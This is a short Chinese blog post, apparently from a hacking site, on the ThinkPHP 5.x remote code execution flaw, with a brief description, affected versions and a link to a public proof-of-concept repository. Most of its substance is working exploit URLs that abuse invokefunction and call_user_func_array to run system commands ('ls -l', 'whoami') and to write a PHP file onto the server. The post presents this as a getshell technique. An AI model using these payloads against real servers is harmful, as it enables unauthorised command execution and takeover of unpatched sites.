ThinkPHP v5.x版本技术,学习,新花样,大神操作

By admin

2019-10-07 15:42:45

浏览量20

已赞0

漏洞描述:

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell


影响范围:v5.x < 5.1.31,<= 5.0.23 


漏洞详情:


本地搭建了一个ThinkPHP5 的环境



https://www.0dayhack.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l


1.PNG


看看权限


https://www.0dayhack.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami


2.png

写个phpinfo


https://www.0dayhack.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php


3.png

查看一下

4.png

附上github上的一个poc利用


Dependencies:

pip install -r requirements.txt


6.png



给上地址:

https://github.com/heroanswer/thinkphp_rce_poc/

附上自己弄的  有点小鸡肋,就不用放出了

7.png

鸡肋ing


发表评论
拖动滑块验证
»
请先 注册/登录 后参与评论

已有0 发布

默认   热门   正序   倒序
    查看更多评论
    已有0次打赏